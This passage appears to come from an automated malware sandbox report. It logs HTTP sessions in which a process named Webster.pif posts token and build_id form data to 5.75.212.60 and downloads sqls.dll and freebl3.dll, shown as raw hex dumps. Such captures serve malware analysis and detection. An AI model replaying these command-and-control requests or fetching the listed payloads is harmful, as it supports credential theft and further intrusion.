                                                                                2024-07-26 15:54:34 UTC5105OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DAECGCGHCGHCAKECBKJKCont
                                                                                2024-07-26 15:54:36 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.6641745.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:35 UTC238OUTGET /sqls.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:35 UTC261INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:35 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 2459136
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:35 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:35 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                2024-07-26 15:54:35 UTC16384INData Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                Data Ascii: %:X~e!*FW|>|L1146
                                                                                2024-07-26 15:54:35 UTC16384INData Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8
                                                                                Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24
                                                                                Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b
                                                                                Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                                Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                                Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                2024-07-26 15:54:36 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.6641755.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:38 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 829
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:38 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------AKEGDAKEHJDHIDHJJDAECont
                                                                                2024-07-26 15:54:39 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.6641765.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:39 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJD
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 437
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:39 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DBAEHCGHIIIDHIECFHJDCont
                                                                                2024-07-26 15:54:40 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.6641775.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:40 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJD
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 437
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:40 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------HJDGHIJDGCBAAAAAFIJDCont
                                                                                2024-07-26 15:54:41 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.6641785.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:41 UTC241OUTGET /freebl3.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:42 UTC260INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:42 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 685392
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:42 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:42 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3
                                                                                Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                2024-07-26 15:54:42 UTC16384INData Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90
                                                                                Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
